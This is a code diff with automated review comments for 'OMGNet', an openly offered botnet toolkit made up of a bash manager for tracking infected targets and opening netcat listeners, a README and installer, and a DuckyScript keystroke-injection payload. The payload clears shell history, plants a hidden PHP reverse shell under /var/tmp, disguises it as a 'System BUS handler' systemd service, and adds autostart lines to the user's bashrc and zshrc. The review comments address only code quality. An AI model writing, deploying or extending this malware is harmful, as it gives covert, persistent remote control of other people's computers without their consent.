echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mTarget exist with similar IP address \"$ip\" and port number \"$port\"."
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
max=65535
|
||||||
|
min=1500
|
||||||
|
read -p "Specify directory for output: " dir
|
||||||
|
if [ ! -d "$dir" ]; then
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0m\"$dir\" no such directory."
|
||||||
|
exit 1
|
||||||
|
else
|
||||||
|
cp -r ~/.config/OMGNet/payload $dir
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )); then
|
||||||
|
sed -i -e "s/0.0.0.0/$ip/g" $dir/payload
|
||||||
|
sed -i -e "s/4444/$port/g" $dir/payload
|
||||||
|
echo -e "$(echo "$name"|xargs)\t$ip\t$port" >> ~/.config/OMGNet/OMGNet.db
|
||||||
|
read -p "Do you want payload encoded(y|n): " enc
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mInvalid IP address \"$ip\" or Port number \"$port\"."
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
}
|
||||||
|
list () {
|
||||||
|
|
||||||
|
column -t -o ' ' ~/.config/OMGNet/OMGNet.db | awk '{print NR" - "$0}'
|
||||||
|
}
|
||||||
|
remove () {
|
||||||
|
echo
|
||||||
|
list
|
||||||
|
echo
|
||||||
|
read -p "Enter name of target to remove: " rmv
|
||||||
|
if grep -q $rmv ~/.config/OMGNet/OMGNet.db; then
|
||||||
|
sed -i "/\b\($rmv\)\b/d" ~/.config/OMGNet/OMGNet.db
|
||||||
|
echo -e "\033[0;32m\e[1mOMGNetManager:Success:\e[0mRemoved \"$rmv\"."
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0m\"$rmv\" no such target found."
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
update () {
|
||||||
|
echo
|
||||||
|
list
|
||||||
|
echo
|
||||||
|
read -p "Choose target number: " cho
|
||||||
|
read -p "You want to update (ip|port): " ent
|
||||||
|
if [ "$ent" = ip ]
|
||||||
|
then
|
||||||
|
one=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
|
||||||
|
read -p "Enter new ip: " use
|
||||||
|
if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
|
||||||
|
sed -i -e "$cho s/$one/$use/g" ~/.config/OMGNet/OMGNet.db
|
||||||
|
echo -e "\033[0;32m\e[1mOMGNetManager:Success:\e[0mUpdated IP."
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mInvalid IP address \"$use\"."
|
||||||
|
exit
|
||||||
|
fi
|
||||||
|
elif [ "$ent" = port ]
|
||||||
|
then
|
||||||
|
two=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | awk '{print $ 3}')
|
||||||
|
read -p "Enter new Port number: " useP
|
||||||
|
max=65535
|
||||||
|
min=1500
|
||||||
|
if (( $useP <= $max )) && (( $useP >= $min )); then
|
||||||
|
sed -i -e "$cho s/$two/$useP/g" ~/.config/OMGNet/OMGNet.db
|
||||||
|
echo -e "\033[0;32m\e[1mOMGNetManager:Success:\e[0mUpdated Port number\"$ent\"."
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNet:Error:\e[0mInvalid Port Number \"$useP\"."
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e0m[Invalid choice \"$ent\"."
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
connect () {
|
||||||
|
echo
|
||||||
|
list
|
||||||
|
echo
|
||||||
|
read -p "Enter Target number to connect: " cho
|
||||||
|
one=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
|
||||||
|
two=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | awk '{print $ 3}')
|
||||||
|
read -p "Do you want to listen on local address(y|n): " src
|
||||||
|
if [ "$src" = n ]
|
||||||
|
then
|
||||||
|
echo -e "Listning on IP address \"$one\" and Port number \"$two\"...."
|
||||||
|
nc -lv -s $one -p $two
|
||||||
|
elif [ "$src" = y ]
|
||||||
|
then
|
||||||
|
echo -e "Listning on Port number \"$two\"...."
|
||||||
|
nc -nvlp $two
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mInvalid choice \"$src\"."
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
if [ "$ch" = 1 ]
|
||||||
|
then
|
||||||
|
connect
|
||||||
|
elif [ "$ch" = 2 ]
|
||||||
|
then
|
||||||
|
create
|
||||||
|
elif [ "$ch" = 3 ]
|
||||||
|
then
|
||||||
|
list
|
||||||
|
elif [ "$ch" = 4 ]
|
||||||
|
then
|
||||||
|
remove
|
||||||
|
elif [ "$ch" = 5 ]
|
||||||
|
then
|
||||||
|
update
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNet:Error:\e[0mInvalid choice \"$ch\"."
|
||||||
|
fi
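Review bot: `remove()` tests the name with `grep -q $rmv` and deletes with `sed -i "/\b\($rmv\)\b/d"`, so `$rmv` is treated as an unquoted regex matched anywhere on the line: a name that is also a word in another entry or an octet of a stored IP (e.g. `10`) removes every such row, regex metacharacters are interpreted, and an empty answer leaves `grep -q` with the db path as its pattern and stdin as its input. Match the first column exactly instead: `tmp=$(mktemp)` then `awk -v n="$rmv" '$1 != n' ~/.config/OMGNet/OMGNet.db > "$tmp" && mv -- "$tmp" ~/.config/OMGNet/OMGNet.db`; the same unquoted-regex issue applies to `grep -oh "\w*$name\w*"` and the `$ip`/`$port` greps in `create()`. Two smaller points: the final `else` in `update()` prints `\e0m[` where `\e[0m` is intended, so the colour reset never fires and a stray `[` is printed, and `create()` prompts for `enc` (`Do you want payload encoded`) but never reads the variable afterwards.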
|
|
@ -0,0 +1,28 @@
|
||||||
|
# OMGNet
|
||||||
|
|
||||||
|
## About:
|
||||||
|
* Title: OMGNet
|
||||||
|
* Description: Create, Encode, Inject, Spread your OMGNet and manage it using OMGNetManager.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Remote Access
|
||||||
|
* Target: Unix-like operating systems with systemd.
|
||||||
|
* Attackmodes: HID
|
||||||
|
|
||||||
|
## OMGNet is cluster of systems infected with persistentReverseOMG which are manged by OMGNetManager.
|
||||||
|
|
||||||
|
### Functions:
|
||||||
|
* Connect to target.
|
||||||
|
* Create new target.
|
||||||
|
* List targets.
|
||||||
|
* Remove target.
|
||||||
|
* Update target.
|
||||||
|
|
||||||
|
### Installation:
|
||||||
|
Use ``install.sh`` script to install OMGNetManager.
|
||||||
|
|
||||||
|
### Usage:
|
||||||
|
Use command ``OMGNetManager``.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,5 @@
|
||||||
|
mkdir ~/.config/OMGNet
|
||||||
|
mv payload ~/.config/OMGNet/
|
||||||
|
touch ~/.config/OMGNet/OMGNet.db
|
||||||
|
chmod +x OMGNetManager
|
||||||
|
sudo mv OMGNetManager /bin/
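Review bot: `mkdir ~/.config/OMGNet` has no `-p`, and nothing in the script stops on failure, so on a second run (or when the directory already exists) the `mkdir` error is ignored and `mv payload ~/.config/OMGNet/` and `sudo mv OMGNetManager /bin/` still run, the first of which silently overwrites the `payload` already installed there. Start the file with `#!/usr/bin/env bash` and `set -eu`, and use `mkdir -p -- ~/.config/OMGNet`. `/bin` is reserved for distribution-managed binaries, so `sudo install -m 755 OMGNetManager /usr/local/bin/` is the conventional destination for a locally installed script.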
|
|
@ -0,0 +1,50 @@
|
||||||
|
REM Title: OMGNet
|
||||||
|
REM Description: Create, Encode, Inject, Spread your OMGNet and manage it using OMGNetManager.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Remote Access
|
||||||
|
REM Target: Unix-like operating systems with systemd.
|
||||||
|
REM Attackmodes: HID
|
||||||
|
|
||||||
|
REM [keeping tracks clear]
|
||||||
|
DELAY 500
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 400
|
||||||
|
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
|
||||||
|
REM [creating reverse shell]
|
||||||
|
STRING mkdir /var/tmp/.system
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING chmod +x /var/tmp/.system/systemBus
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
|
||||||
|
REM [creating non-root systemd service]
|
||||||
|
STRING mkdir -p ~/.config/systemd/user
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
|
||||||
|
REM [enabling service]
|
||||||
|
STRING systemctl --user daemon-reload
|
||||||
|
ENTER
|
||||||
|
STRING systemctl --user enable --now systemBUS.service
|
||||||
|
ENTER
|
||||||
|
STRING systemctl --user start --now systemBUS.service
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
|
||||||
|
REM [autostarting service on terminal/shell launch]
|
||||||
|
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp
|
||||||
|
ENTER
|
||||||
|
DELAY 50
|
||||||
|
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
||||||
|
ENTER
|